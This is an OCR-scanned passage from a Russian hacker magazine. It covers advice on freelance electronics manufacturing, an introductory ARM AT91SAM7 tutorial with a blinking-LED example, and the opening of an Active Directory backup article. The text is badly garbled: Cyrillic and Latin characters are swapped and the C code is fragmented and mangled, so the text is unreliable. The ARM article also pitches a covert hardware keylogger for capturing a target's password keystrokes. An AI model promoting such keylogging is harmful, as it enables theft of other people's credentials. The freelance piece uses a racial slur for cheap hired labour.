с каждого девайса. Когда их многиетысячи, то навар выходит жирным. 

Об оплате! Если заказчик новый, то всегда бери предоплату, хотя бы на раз- 
работку прототипа, примерно две-три себестоимости. Я обычно работаю 
с 50% предоплатой. Таким образом, и комплектуху закупаю не из своего 
кармана, и заказчикнесмоется, оставивтебя с горой ненужной продукции. 
Авотс проверенными заказчиками можно работать даже вдолг. 

В ОТ ТЗ ДО ПРОТОТИПА 

Допустим, заказчика ты нашел. Он хочет, чтобы было круто, но при этом 
сам толком не знает, как это должно быть. В 90% таких мелких заказов 
техническое задание представляет собой словесное описание вроде: 
«Сначала оно должнотут крутиться, а затем после нажатия пикать и ми- 
гать, а потом включить вот эту фиговину на пять минут». На практике ока- 
зывается, что опущено множество деталей. Поэтому сразу же вытягивай 
максимум информации об окружающей действительности и поставленной 
задаче. Для себя ты должен четко уяснить, что должен делать девайс, в 
какой последовательности и что не должен делать ни при каких обстоя- 
тельствах, и как должен обрабатывать внештатные ситуации. Например, 
в блоке, связывающем сигнализацию и сотовый телефон, иногда может 
в оз никнуть та кая проблема, что телефон зависает или самопроизволь- 
но выключается. Спрогнозировать это сложно, вероятность невелика, 
но и такие неочевидные баги должны бытьучтены как можно быстрей. 
Кстати, не исключена вероятность, что заказчикдаже и не догадывается 
о возможных проблемах, но поскольку ему надо, чтобы «работало и не ко- 
лышет», то решать их придется тебе. Так что, проявляй инженерное чутье 



и просчитывай возможные косяки задолго до того, как они возникнут. Тут 
лучше перебди, чем недобди. 

При проектировке девайса всегда следуетучитывать, что в последний 
момент заказчику, наверняка, захочется добавить еще одну пимпочку, про 
которую он забыл и которая ему нужна «ну просто позарез». Поэтому — ос- 
тавляем возможность для роста и апгрейда малой кровью, без переделки 
всего девайса. 

В ДЕЛАЕМ ДЕВАЙС 

Для меня ведущим направлением стала автоматика, поэтому расписы- 
вать все буду на ее основе. Готовые решения порой стоят неадекватно 
дорого, а разработка требует минимум временных и материальных 
затрат. В разработке, скажем, аудиотехники дела обстоят несколько 
иначе, но общий принцип схож, просто это не мой профиль. Итак, на- 
пример, есть задача выполнить последовательность действий исходя 
из заданных условий. Раз уж брать за пример последний мой проект, то 
там требовалось отслеживать уровень фекалий в баке и, если дерьмо 
полезет через горловину бака — поднимать шухер и автоматически 
вызывать ассенизаторскую бочку. В качестве бонуса — возможность 
всегда узнать степень заполнения бака, хотя бы примерно. А что, 
насущная проблема для садоводов и дачников! Под такие задачки из 
готовых решений существуют «Программируемые Логические Конт- 
роллеры» (не путай с микроконтроллером). ПЛ К стоят от восьми тысяч 
рублей и это, не считая того, что к ним нужен программатор, источник 
питания плюс куча всего, включая работу. В сумме выходило тысяч 
на пятнадцать. Это не устраивало заказчика, и он обратился ко мне. 
Итогом стало изготовление девайса на микроконтроллере, который 
обошелся заказчику всего в три тысячи рублей. Кстати, старайся все 
делать на МК. Во-первых, это проще. Во-вторых, зачастую дешевле. 
В-третьих, в любой момент логику управления можно перепрограм- 
мировать под изменившееся ТЗ. Наконец (самое важное!), прошивку 
контроллера можно наглухо заблокировать, исключив, тем самым, 
риск, что твой девайс скопируют. Это оставляет тебя единственным 
возможным производителем. Если потребуется еще один девайс, то 
заказывать у третьей стороны будет дороже, чем вновь обратиться к 
тебе. При разработке существует два подхода: когда девайс штучный и 
когда серийный. Это принципиально разные вещи. В штучном приборе 
ты можешь вытворять, что угодно, лишь бы работало, как надо, а что там 
внутри — никого не волнует. Поэтому тутуместен и перерасход ресур- 
сов, например, использование контроллера класса Меда только из-за 
того, что есть готовые проги под данный контроллер (хотя на деле там 
хватит и куда более дешевого Тіпу), и использование всего, что под руку 
подвернется. В этом случае цена конечного устройства особо не важна 
(в разумных пределах, конечно). Как правило, она не отсвечивает на 
фоне получаемого гонорара за всю работу. Совсем иное дело — когда 
продукт обещает быть серийным. Уже от двадцати штук можно считать 
серией. Здесь каждая сэкономленная копейка идет не куда-нибудь, а 
в твой собственный карман. Так что, зажимай каждый миллиметр тек- 
столита, каждый резистор, а все, что можно реализовать программно 

— делай программно. Каждая лишняя перемычка — это затраченная 
минута твоего времени или лишняя копейка монтажнику. Старайся 
использовать самый дешевый контроллер, который можешь подвести 
под свою задачу, пусть даже для этого придется всюпрошивку — от и 
до — написать на ассемблере. Пусть уйдет бол ьше времени, неважно 

— делаешьты один раз, а прибыль будешь получать многократно. Поэ- 
тому оптимизация, оптимизация и еще раз оптимизация! 
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От самодельных монтажекс ошибками — к многосерийному заводскому 
производству 



было зайти в наш универ на радиофакультет и завербовать нескольких 
студентов, чтобы они в свободное время клепали девайсы практически 
даром. Итог — я регулярно получаю бабло, а не делаю вообще ничего! Кру- 
то, правда? Учти, что если сборка платы идет вручную, то глупо в качестве 
элементной базы брать микроскопические компоненты вроде резисторов 
0608. Мельчить не нужно, но и ставить выводные компоненты тоже не 
лучший выбор, сверловка — дорогое удовольствие. Оптимальным будет 
размер 5Мй 1 206 и всякие 501 С для микросхем. Элементы лучше исполь- 
зовать поверхностные, чтобы не сверлить дырки в платах (трудоемко и 
требует кучи времени). Если будешь делать на контроллере, то обязатель- 
но сделай так, чтобы устройство можно было прошивать, не извлекая чип 
из платы. Я, вообще, делаю на плате краевой разъем (как на платах РСІ 
формата, только всего на шесть контактов), чтобы не заморачиваться со 
сверлением дырок под штырьки. 

Этикетки и лицевые панели на первых порах можно делать самостоятель- 
но, а потом — перепоручить эту работу рекламному агентству (главное, 
чтобы у них был режущий плоттер, а наклепать наклеек — плевое дело). 

Н РАЗБОРКИ 

Если возникнут какие-то неполадки, то помни, что клиентвсегда прав. 
Даже если он не прав полностью. Клиентов у тебя не так много, поэтому 
лучше исправить косяк и сохранить добрые отношения, чем посылать и 
терять заработок. Если что-то не работает, то выясняй причину и делай, 
чтобы работало правильно. Если потребуется замена железа, то меняй, 
тем более, обычно достаточно перепрошивки устройства (если разработка 
на контроллере). Если клиентхочет новых фич, которых не было ранее, 
то можешь их добавить, чуть увеличив стоимость. Либо взяв разовый 
гонорар за доработку. Тут надо судить по обстоятельствам. Помни, что 
серийное производствоутебя в руках, а значитзаказчику, как правило, 
не выгодно искать кого-либо еще, опять терять время и деньги. Ну и, 
конечно, должно быть правило: «сказано — сделано». Лучшеуказывать 
сроки изготовления сзапасом, чтобы потом не было запары. Но, думаю, 
это и так ясно. 



Также не стоитзабывать об элементной базе. Если проектируешь за- 
ведомо серийный девайс, то глупо пихать в него что попало, а вдруг не 
найдешь данный компонент в нужном количестве? Единственно, когда в 
серийном производстве разумен перерасход ресурсов и изготовление из 
подручных средств — если время нетерпит, и заказчику как можно скорей 
нужна опытная партия. Воттут — да, лишь бы выдать, но потом все равно 
надо оптимизировать и уже следующие партии выдавать со снижением 
себестоимости до минимума. Но ни в коем случае не ценой надежности! 
Кстати, можно перестраховаться, например, предусмотреть какой-нибудь 
защитный фильтр, но в итоге его не впаивать, оставив пустую контактную 
площадку. Именно по этой причине на современной электронике столько 
незапаянных деталей — разработчик подстраховался, но оказалось, что и 
без них все отлично работает, и их сократили во имя экономии. 

Если планируются большие партии (от пятидесяти штук и более), то про- 
изводство имеетсмысл перепоручить кому-либо другому. Да, потеряешь 
часть прибыли, возрастет себестоимость продукта, но зато капитально вы- 
играешь во времени. Причем, не обязательно искать специализирован- 
ное предприятие по изготовлению печатных плат. Обычно это обходится 
довольно дорого, тем более, раз партия исчисляется лишь несколькими 
десятками штук в месяц. Куда дешевле найти «негров». Мне достаточно 



В БЮРОКРАТИЯ 

В последнее время я начал задумываться об открытии ЧП (частный пред- 
приниматель, самый простой вариант регистрации бизнеса). До этого 
все договоры были на словах, ТЗ — устное, а все неприятности обычно 
обходили стороной (особенно этому способствовала предоплата). Но с 
расширением производства назревает вопрос легализации и регис- 
трации. Из минусов — придется платить налоги, из плюсов — гораздо 
солидней выглядит. Ты уже не какой-то хмырь с паяльником, а реальный 
коммерс, с которым можно иметь дело серьезно, заключать договора, что 
дает гарантии кактебе, так и заказчику. В общем, кредит доверия выше в 
разы — и это благоприятно сказывается на числе заказчиков. Между фир- 
мами очень распространена оплата по безналу, настолько, что с наличкой 
многие вообще не связываются, а такие расчеты возможны только между 
юридическими лицами. 

г оілко 

Воти вся премудрость. Если интересны другие детали, то пиши мне на 
мыло или заходи на мой сайт ІіНрѴ/сІіІіаІі.ги и оставляй комментарий клю- 
бой записи. Аесли утебя есть идеи или предложения о сотрудничестве, то 
тем более — милости просим, вместе обмозгуем дело кобоюдной выгоде. 
Удачи, коллега !зс 
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АНДРЕЙ «ОРЮГРСЫЗ» ГУСАКОВ 



/ ОКОГ4_С1ІЗ@МАІІ.,.ГШ / 




ПРОГРАММИРУЕМ 



ЖЕЛЕЗНЫЕ 



РУКИ» 



ОСВАИВАЕМ КОНТРОЛЛЕРЫ АРХИТЕКТУРЫ АРМ 



Нет, мы не будем имплантировать в твое бренное тело электроды и посылать 



атрофированным мышцам киловольты, мы займемся привычным делом — 
программингом. Только вот от банальной архитектуры х86 откажемс я в по ль- 
зу менее известной, но более пригодной для создания фрикерских деш^^в 
архитектуры АКМ. Переводится это как Абѵапсесі КІ5С МасЫпез. При умелом 
использовании контроллеры на этой архитектуре заменят тебе руки. . . 

■ щ 

а, возможно, и мозги. 



^ ЭКСКУРС В ИСТОРИЮ 

Архитектура АРМ зародилась в Асогп Сотрійегз в 1983-85 годах. Основ- 
ной фичей этой архитектуры по сравнению с множеством других РІЗС’ов 
были инструкции сусловным выполнением. Так, на классической архитек- 
туре х86 выражение в стиле «ТГ (условие) оператор 1 еіве опера- 
тор2» после компиляции генерирует код, как минимум с двумя перехода- 
ми. Тебе, конечно, известно, чтолюбые переходы требуют перезагрузки 
всего конвейера, отчего и теряется драгоценная производительность 
конвейерных процов. Для каждой АРМ-инструкции существует4-битный 
префикс условия — любая инструкция можетбыть выполнена или нет, в 



зависимости отустановленных флагов. Таким образом, туже конструкцию 
іі для АРМа можно выразить в виде линейного кода. 

ПРЕИМУЩЕСТВА УСЛОВНОГО ВЫПОЛНЕНИЯ 

II (условие) операторі еізе оператор2 
Классическая архитектура (например, х8б) : 

1 . Проверить условие 

2 . Если не выполнено — идти к 5 

3 . Операторі 

4 . Идти к б 
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5 . Оператор2 

6 ... 

Архитектура АКМ: 

1 . На основании условия взвести или нет флаги 

2 . Операторі при условии взведения флага 

3 . 0ператор2 при условии невзведения флага 

Код с «условными инструкциями» получается компактней и не содержит 
ни одного перехода, которые так бьют по производительности. Дотошным 
читателям может показаться, что варианте «условными инструкция ми» за- 
нимает больше процессорных тактов, особенно при развернутых операто- 
рах в ветвях цикла, но современные компиляторы умеют пользоваться этой 
фичей АРМов только там, где надо. 

Другой фичей является выполнение нескольких простых операций в одной 
инструкции. Тем самым обеспечивается еще большая плотность кода и про- 
изводительность. За счеттаких операций в некоторых случаях можно отка- 
заться отхранения результатов промежуточных вычислений в регистрах. 
Первый процессор АРМ1 выпустили в 1985-м, а через год появился и ком- 
мерческий вариант — АРМ2. Натотмоментон был настоящим прорывом: 
насчитывая вчетверо меньшетранзисторов, чем 286 процессор, АРМ2, тем 
не менее, обгонял его по производительности и ктомуже был 32-разряд- 
ным. Позже появился процессор АПМЗ с еще большей производительнос- 
тью и апгрейдом в виде4 Кб кэш-памяти. 

В 1 990 году результатом совместной работы с Арріе стало ядро АПМ6 
ипроцнае го основе — АПМ61 0. Кстати, именно этот процессор был 
использован в одном из первых КПКАррІе Меѵѵіоп. Но в 90-хтягаться 
с более производительными и монструозными конкурентами было 
сложно, и АРМ стала позиционировать свои процессоры, как «встраи- 
ваемые». Любой желающий мог «воткнуть» АРМ -ядро в свой специали- 
зированный процессор. Эта стратегия оказаласьудачной, так что скоро 
архитектура получила широчайшее распространение. Ядро АРМ70ТМІ 
— основа огромного количества процов для сотиков. Именно оно и 
будет предметом дальнейшего разговора. Сегодня АРМ — 75% от всех 
выпускаемых интегрируемых процессоров. Их ставят в сотики и КПК, 
контроллеры НОО и маршрутизаторы. Для КПК, кстати, есть отдельная 
более производительная ветка — ЗігопдАРМ. Іпіеітоже отхватила себе 
кусочек 51 го пд АРМ и теперь развивает их под именем ХБсаІе. 
Разобравшись с этой архитектурой и научившисьхорошо программиро- 



вать, ты сможешь поднимать неплохие деньги и выбиратьсебе направле- 
ние работы по вкусу, начиная с программирования сотовыхтелефонов и 
трЗ- плееров и заканчивая ѴѴІРІ- роутера ми и шлюзами. Хочешь про- 
граммируй «голое»железо, хочешь — ставь Ііпих, дпх или даже ѵѵіпсіоѵѵб 
се/тоЬІІе. 

В ВЫБИРАЕМ ПРОЦ И ПЛАТУ 

Перейдем от истории ко дню сегодняшнему и посмотрим, чем можетбыть 
полезен АРМ кул-хацкеру. Ныне АРМы выпускают все, кому не лень, от мел- 
ких фирм, даже не имеющих своих производств, до гигантовтипа РЬІІірв и 
Аіппеі. Продукты этих двух производителей наиболее доступны в магазинах 
(в разумных количествах, а не партиями от 10000 шт.). Еще нас пока мало 
интересуют ядра АРМ9 и выше: сотни мегагерц, кучи интерфейсов — это, 
конечно, вкусно, но корпуса ВбАи цены делаютэти процессоры сложными 
в применении для обычного радиолюбителя. 

Я предлагаю начать с продукции фирмы Аіппеі (про контроллеры 
АТ пледа ты мог неоднократно читать в][). Меня их товар привлека- 
ет еще со времен знакомства с контроллерами архитектуры 8051 . 
Отличная, понятная документация, обилие примеров и множество 
приверженцев будут хорошим подспорьем при изучении нового для 
тебя направления. Фирма Аігшеі производит достаточно широкую 
линейку процессоров на ядре АПМ70ТМІ. Предлагаю остановиться 
на АТ91 5АМ 75256. Ресурсов даже такого мелкого процессора хватит 
для декодирования трЗ в реальном времени. Проверенно! Кстати, 
немного о самом контроллере: 

• ядро АРМ70ТМІ до 55 МГц (при желании можно разогнать); 

• 256 кило флешки; 

• 64 кило ОЗУ (Винду мы на него ставить не будем, так что этого нам хватит); 

• 32 ноги под различные интерфейсы и самостоятельное дерганье; 

• 115 В беѵісе МІвреесІ (до 12 Мбит/сек для общения с ПК); 

• куча различных вкусностей —таймеры, часы реального времени, конт- 
роллер прерываний, ОМАит.д. 

Единственный минус контроллера — это корпус. Ксожалению, процес- 
соры такого уровня уже давно не выпускаются в корпусах О I Р ( когда ноги 
продеваются в отверстия платы). Есть вариант корпуса ЕОЕР (ноги на все 
четыре стороны с шагом 0.5). Для самостоятельной пайки вариант не очень, 
а для самостоятельного изготовления платы —тем паче. Но нестоит отча- 
иваться! Во-первых, можно купить платку-переходник. Во-вторых, купить 
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отладочную плату с этим процом, забыть про пайку и сразуже погрузиться 
в программирование. Я себе купил платку 0ЫМЕХ5АМ7-Р256 (впрочем, 
есть и другие варианты). 

Что ты получишь, приобретя эту плату: 

• заботливо распаянные разъемы 115В, 2 х Р5232, ММС/ЗБ, ЛА6; 

• парукнопок; 

• датчиктемпературы; 

• все сигналы процессора, выведенные на линейку контактов; 

• небольшую зону для макетирования; 

• стабилизатор питания и кнопку гевеі ; 

• избавление от геморроя с пайкой (это главное). 

Если помнишь, в статье «Шпионим за тетей Клавой»у Оііпуі и5егд2х2 
возникла проблема охранением длинного лога нажатых кнопок. С этим 
контроллером ты можешьзабытьотакихтраблах. Вряд ли тебе удастся за- 
бить всю флеш. Остаток можно перепрограммировать прямо из программы 
и кидать туда логи. В списке вкусностей платы от О І_І МЕХ упомянут разъем 
ММС/50 — значит, к процулегко можно прицепить флешку. Фантазия 
работает? Да, этого процессора за глаза хватит для обработки файловой 
системыІУ него еще и 115В есть... Можно даже тавв зіогаде изобразить. 
Так что, если твой подопытный перед вводом пароля захочет протереть 
клаву или, что еще хуже, пересказать«Войну и мир», ты не потеряешьни 
одного драгоценного символа. Они будут заботливо сложены на много-ги- 
габайтную флешку. Принеся такой логгер домой, ты сможешь его запросто 
воткнуть в УСБ и без особых извращений просмотреть все добытое в виде 
обычныхтекстовых файлов на обычном съемном диске. 

Но это пока фантазии. До того, какты сможешь написатьтакую прошивку, 
тебе придется много работать и многое изучить. 

В СРЕДСТВА РАЗРАБОТКИ 

Перечислять все компиляторы, а тем более, среды разработки не имеет 
смысла. Погуглив минут пять, любой желающий без труда найдет не- 
сколько вариантов. Я предлагаю начать с ІАР ЕтЬесІсІесІ ѴѴогкЬепсЬ ЮЕ. 
Эта среда требует минимум настроек перед работой, под нее имеется 
множество примеров и т.д. Писать программу можно как на чистом С, так и 
на С++. Можно писать и на ассемблере, но для таких процессоров это редко 
практикуется. Для джедаев могу предложить попробовать поставить ѲСС 
с какой-нибудь средой вроде Есіірве, но я эту связку настроить так и не 
сумел. Если тебе удастся — черкани мне пару строк. 

Предположим, программуты написал, откомпилировал и получил прошив- 
ку. Возникает резонный вопрос: какее залить в камень? Существуют раз- 
личные внутрисхемные отладчики/программаторы для АРМ -процессоров, 
такие как: ѴѴгіддІег, Э- Ып к, Ш-Ііпк, МТ-Ыпк, ЭеНіпк ит.д. Покаты плотно не 
занялся этими процессорами, покупать отладчик не имеетсмысла (стоить 



он будет нетакуж мало). ТутАітеІ позаботилась о нас. В процессоре есть 
зашитый на заводе загрузчик. После определенной манипуляции с внеш- 
ними сигналами управление передается ему. Далее, по 115В или Р5232, с 
помощью специального софта мы можем послать новую прошивку. Проц 
зальет ее во флеш или в ОЗУ и начнет выполнять. Это не самый удобный 
вариант, так как все время приходится перекидывать джамперы, но зато 
он экономиттвои деньги. Софтина называется 5АМ-РР06 и идетв наборе 
утилит от Аіппе I — АТ91 Іп-вувіепп Ргодгаттег (І5Р). 

ВПЕРВЫЕ ШАГИ 

Предположим, я убедил тебя в целесообразности покупки платки отОІІтех. 
Что дальше?Лезем на сайтАітеІ, находимтам свой процессор. Качаем на 
него дата шит (этот документ станет для тебя Библией на все время работы) 
и программу АТ91 Іп-зузіет Ргодгаттег (І5Р). Ставим программу. Ничего 
сложного, комментировать не буду. 

Теперь берем плату в руки и ищем на ней джампер ТЕ5Т. Если при сбросе 
процессор видит, что на этой ноге лог 1 , то он сам себя прошиваетза- 
грузчиком 5АМ-ВА. Загрузчик получаетуправление после сброса и ждет 
«указаний». Итак, замыкаем джампер и втыкаем ІІ5В-шнурок. На плате 
должен загореться красный светодиод — это значит, что на плату поступает 
питание. Считаем до 20 (ждем пока 5АМ-ВА перешьется во флеш), выни- 
маемУСБ, снимаем джамперТЕЗТ и снова втыкаем шнурок. Твой ѴѴІпсІоѵѵз 
должен увидеть новое устройство (что-то вроде «а ѣтбі 2 4 . зуз АТМЕЬ 
АТ91ххххх Тезѣ ВоагФ>). После установки всех драйверов можно 
запустить программу 5АМ-РР06 и убедиться, что она видит подключенный 
процессор. К сожалей ию, под некоторыми Виндами софт от Аітеі работает 
не совсем стабильно и приходится танцевать с бубном. Если 5АМ-РР0Ѳ 
вылетаете ошибкой, попробуй сначала запустить софтину, а потом уже 
подключать шнурок к плате. 

Лезем на сайт ОЫ МЕХ, ищем свою платку и качаем Ьіп-файл примера 
Вііпкіпд БЕй ргоіесБ Какследует из названия — это обычная мигалка све- 
тодиодами. Кормим файл 5АМ-РР06 и жмем «ѴѴгііег ЕІазЬ». Передергива- 
ем 115В и видим на отладочной плате два мигающих светодиода. Если нет 
— проверь, стоятли утебя на плате джамперы І_Е01 и БЕБ2 (они должны 
быть замкнуты). 

И КАКЖЕ ЭТО РАБОТАЕТ? 

Теперь давай попробуем разобраться, как это работает. С того же сайта 
качаем исходный проект и открываем его ІАР ЕтЬесІсІесІ ѴѴогкЬепсЬ 
I БЕ. Если ты еще не успел установить себе эту среду разработки, мо- 
жешь открыть си-файлы обычным блокнотом (для понимания принци- 
па этого будет достаточно). Весь проект состоит из двух исходников: 
зузѣеш . с и шаіп . с. 
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Отладки для аггш9: левая под 5^9121^/44, правая под аі91 гпп9200 (на нейлинух) 



АТ9ІРЗ_РІО ш рРіо 

= АТ 9 1 С_ВАЗ Е_Р I ОА ; 
іпР таіп ( ) 

{ 

//ІпіР Ргедиепсу 
ІпіРЕгес ( ) ; 

/ /ІпіР Іесіз 
ІпіРРегірЪ.егу ( ) ; 

// Іоор Рогеѵег 
ѵгЫіе ( 1 ) 



• Запуск кварцевого генератора (сам кварц 
ты можешь найти на плате — металлическая 
«лодочка» с надписью 18.432). Кварц генерирует 
на частоте 18.432 МГц. Это далеко не предельная 
частота функционирования процессора. 

• Запуск РІ_І_ (ФАПЧ). Не вдаваясь в подроб- 
ности, скажу, что на выходе РИГ мы можем получить частоту кварцевого 
генератора, умноженную и поделенную на любые целые коэффициенты 
(РрЦ= Роев * М / й). Конкретно в этой программе числа подобраны так, что- 
бы получить на выходе РІ_І_- частоту примерно 96 МГц (почему — я объясню, 
когда мы начнем знакомиться с блоком 115В) 

• Послеустановления частоты РІ_І_ядро переключается натактирование 
отРІ_І_и включается деление на 2 (ядро теперь работает на частоте 48 МГц). 
Кстати, сразу после сброса ядро работает от встроенного в процессор 
генератора с частотой 22-42 КГц. 

Далее идет настройка выводов процессора. Функция іпіѣРегірЬегу ( ) ■. 



I 



ш_рРіо->РІО_СОБК 

= В I Т 1 8 ; //зеР гед Со 0 (1ес12 оп) 
т_рРіо->РІО_ЗОБК 

= В I Т 1 7 ; //зеС гед Со 1 (ІесИ оРР) 
Беіау ( 800000 ) ; //зітріе сіеіау 

т_рРіо->РІО_СОБК 

= В I Т 1 7 ; //зеС гед Со 0 (Іесіі оп) 
т_рРіо->РІО_ЗОБК 

= В I Т 1 8 ; //зеС гед Со 1 (1ес12 оРР) 
Беіау (800000) ; 



АТ9ІРЗ_РІО р рРіо 

= АТ 9 1С_ВАЗЕ_РІОА; 

АТ9ІРЗ_РМС р_рРМС 
= АТ9 1С_ВАЗЕ_РМС ; 

ѵоісі ІпіРРегірЬегу (ѵоісі) { 

/ * * * * ЬЕБ ВОТТОБЗ * * * * / 
//епаЫе Сііе сіоск оР РЬе РІО 
р_рРМС - >РМС_РСЕР 

• 1 « АТ91С_ІБ_РІОА; 



//зішріе сіеіау 

} 

} 



/ /ЬЕБ 1 

//сопРідиге С Ье РІО Ьіпез 
соггезропсііпд Со ЬЕБІ 
р_рРіо->РІО_РЕК | = ВІТІ7 ; 



Для тех, кто знаком с Си, не составиттруда понять принцип работы этого 
приложения. Даже если некоторые строки и вызывают вопросы, то ком- 
ментарии дают представление об их назначении. 

Установка частоты тактирования процессора — вызов іпіѣРгес ( ) . Код 
самой функции находится в файле зузіет. с. Детально разбирать его пока 
не имеетсмысла. Надо понять, как работает блоктактирования контроллера. 
Блокдостаточно большой и приводить (или даже переводить) его описание 
издаташита небудем. Вот краткое описаниетого, что делает эта функция: 

• ОтключаетѵѵаІсЬсіод. Это такой блок, который следит за тем, чтобы 
процессор независ. Приложение должно не реже определенного интер- 
вала сбрасывать ѵѵа^сМод, иначе это расценивается какзависание или 
зацикливание процессора и подается сигнал сброса. В нашем примере 
ѵѵаісбсіод не используется и поэтому отключается. Но считается хорошим 
тоном использовать всезаложенные возможности для повышения надеж- 
ности. 



//ЕпаЫе РА17 
р_рРІО->РІО_ОЕК | = ВІТІ7 ; 
//СопРідиге іп ОиРриР 
р_рРіо->РІО_ЗОБК |= В1Т17; 
//зеР гед Со 1 
/ /ЬЕБ 2 

//сопРідиге РЬе РІО Ьіпез 
соггезропсііпд Ро ЬЕБ2 
р_рРіо->РІО_РЕК | = ВІТ18 ; 
//ЕпаЫе РА18 
р_рРіо->РІО_ОЕК | = ВІТІ8 ; 
//СопРідиге іп ОиРриР 
р_рРіо->РІО_ЗОБК |=ВІТ18; 
//зеР гед Ро 1 
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Ты можешь спросить: «Что это за указатели на непонятные структуры?» Та к 
Аітеі предлагает нам работать с периферией. Для каждого узла контрол- 
лера заведена структура, описывающая все регистры, которые к нему отно- 
сятся. Такой подход позволяет достаточно легко использовать один итотже 
код с однотипными узлами процессора (например, с любым из трех каналов 
таймера или одним из двух блоков ІІ5АРТ). Также это позволяете минимум 
исправлений перетаскивать код с одного на другой контроллер. Все эти 
структуры и дефайны для работы с ними описаны в файла хАТ915АМ73хх. 



ЕпаЫе, ОізаЫе, еі:с 

Если ты уже заглянул в файл с описаниями структур, то мог 
заметить, что многие регистры имеют по три «отражения» ЕпаЫе 
(Зеі), ОізаЫе (Сіеаг) и 8ШШ5. При этом первые два регистра — 
только для записи, последний — для чтения. Для чего это сделано? 
Рассмотрим на примере регистров управления портом в/в РІО_ 
ЗСЮК, РЮ_ССЮК и РІО_СЮ5К. При записи в регистр РІО_5СЮІІ 
($еі Отри! ПаШ Ке^ізіег) числа 3 ножки 0 и 1 примут состояние 
лог 1. Остальные ножки не изменят своего состояния. Каждый бит 
этого регистра отвечает за свою ножку. Если мы пишем в этот бит 
1, то соответствующая ножка принимает состояние лог 1, если О 
— не меняет своего состояния. Если после этого записать число 2 в 
регистр РЮ_ССЮК (Сіеаг Отри! Эаіа Ке^ізіег), то ножка 1 примет 
состояние лог 0, а ножка 0 останется в прежнем состоянии. Во 
время всех этих действий регистр РІО_ОПЗК (Отри! Эаіа Зшшз 
Ке^ізіег) отражает текущее состояние порта в/в. 

На первый взгляд, это кажется излишним, ведь можно исполь- 
зовать один регистр и конструкции вроде РІО | = 3; и РІО & = ~ 2. 
Но такие операции не являются атомарными. Это значит, что, 
например, операция РІО | = 3 состоит из трех машинных команд: 
загрузить значение из регистра периферии в регистр общего 
назначения; логическая операция ИЛИ; загрузка значения 
обратно в регистр периферии. Если в процессе выполнения 
этих трех операций произойдет прерывание или переключение 
контекста в ОС, и участок кода, получивший управление, тоже 
захочет установить/сбросить биты регистра РІО, то после возвра- 
та управления, ранее записанные значения могут быть затерты 
последней машинной командой загрузки в регистр РІО. Именно 
поэтому для многих регистров введены такие вот «двойники». 
Обращаться к ним следует обычной операцией присвоения. Это 
гарантирует, что в какой бы момент не произошло прерывание 
или смена контекста, ни одно «воздействие» на регистр не будет 
пропущено. 



Ь в зависимости от конкретного контроллера. Контроллеры аі9І5ат75б4, 
аі9І5ат75І28, аі9І5ат7з256 и а!9 1 за т7зб 12 отличаются только объемами 
памяти, поэтому и файлы описания периферии совпадают. 

Первая строчка (р_рРМС->РМС_РСЕР = 1 << АТ91 С_Ю_Р10А) включает 
тактирование модуля ввода вывода. Именно он отвечает за все 32 ножки 
общего назначения. Контроллер очень гибко настраивается сточки зрения 
потребления, так— почти любой неиспользуемый узел можно отключить. 
Изначально они все отключены (не забудь включить модуль РІО перед 
использованием). 

Далее идет потри однотипных строчки для каждой из двух ног, на кото- 
рых «висят» светодиоды. Первая строчка разрешает контроль ножки 
модулем в/в. Все ноги имеют дополнительные функции и могут быть 
«подключены» к другим модулям (таким как 5РІ, ІІ5АРТ и т.д.). Поэ- 
тому, если мы хотим управлять ножкой через модуль РІО (так сказать, 
«вручную»), то мы предварительно должны это разрешить записью в 
регистр Р10_РЕР (РІО ЕпаЫе Редізіег). Затем стоит назначить эту ножку, 
как выход, записью в регистр Р 1 0_0 Е Р (Оиіриі: ЕпаЫе Педізіег). Ну и, 
наконец, установить на выходе лог 1 с помощью регистра РІ0_500Р (5е1 
Оиіриі Оаіа Редізіег). 

Те, кто уже успел скачать с сайта ОЫМЕХ схему отладочной платы, обрати- 
ли внимание, как подключен светодиод: анодом к источнику +3. ЗВ, катодом 
через резистор к соответствующей ножке контроллера. Сразу же после 
настройки выводов контроллера, когда на них лог 1 (напряжение близкое 
к+З.ЗВ),токчерез светодиод не идет, итотне горит. Чтобы он загорелся, 
необходимо вывести на ногу контроллера логО (напряжение близко кО В). 

В основном цикле как раз и происходит попеременная установка —то лог 
1 , то лог 0 на выходах контроллера. Между установкой и сбросом введены 
небольшие паузы 0е1ау(800000). Без нихты бы неувидел мигания свето- 
диодов, такбы быстро это происходило. Функция задержки реализована 
достаточно просто и прямолинейно, обычным чиклом ѵѵИІІе с переменным 
числом итераций. Такой метод полностью занимает процессор на время 
задержки. Это бесполезное расходование процессорного времени, 
поэтому в следующей статье я покажу, как сделать «мигалку» вначале на 
прерываниях оттаймеров, а потом и посредством простенькой операци- 
онной системы. 

Теперьты можешь попытаться изменить время задержек и откомпилиро- 
вать проектзаново. Ксожалению, на выходе ты не получишь готового 
*.Ып-файла. Тебе придется сделать его самому при помощи утилиты 
Ьех2Ьіп. Но предварительно нужно получить Ьех-файл. Для этого лезем 
в настройки проекта (Рго)есІ Орііопз или <АІІ+Е7>). Там, в разделе 
Ыпкегна закладке Ехіга Оиіриі, ставим галочку Оепегаіе Ехіга Оиіриі, 
Оиіриі Іогтаі — I піеі-ехіепсіесі, галочку Оѵеггісіе беіаиіі и вводим имя с 
расширением Ьех. Внимание: версия Ьех2Ып, которая стоит у меня, плохо 
переваривает имена длиннее 8.3. 

Пожалуй, на сегодня все. Надеюсь, эта обзорная статья заинтересовала 
тебя, и ты уже побежал читать дата шит на контроллер! НС 
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>> ХАКЕРРКО 




ЛОВИ МОМЕНТ! 



іСТІѴЕ ОІРЕСТОРѴ В ѴШ2К8: РЕЗЕРВИРОВАНИЕ И АВАРИЙНОЕ ВОССТАНОВЛЕНИЕ 



Служба доменов Асііѵе БігесШгу на порядок упрощает управление большой 
сетью, но в случае выхода из строя контроллера домена может стать источ- 
ником головной боли. Опытный администратор предусматривает операции 
по резервному копированию и восстановлению АБ еще на этапе разверты- 
вания. 



ОБЩИЕ ВОПРОСЫ 

Несмотря на довольно простое с виду управление, АО является очень 
сложной структурой, реализующей модель Х.500/ЮАР. В ней сохраняется 
вся важная информация об основных элементах сети: доменах, органи- 
зационных единицах (011), компьютерах, групповых политиках и прочее. 
Служба каталогов сама по себе весьма надежна, но любой сбой (например, 
выход из строя жесткого диска) приведет к нарушению работы всех связан- 
ных элементов. 

Мероприятия, обеспечивающие безотказную работу Ай, можно 
разделить на два этапа. При повседневной эксплуатации должен 
производиться постоянный мониторинг как сервера, где установлен 
контроллер до мена, та к и всего остального оборудования, работа 
которого может повлиять на функционирование и доступность. Это 
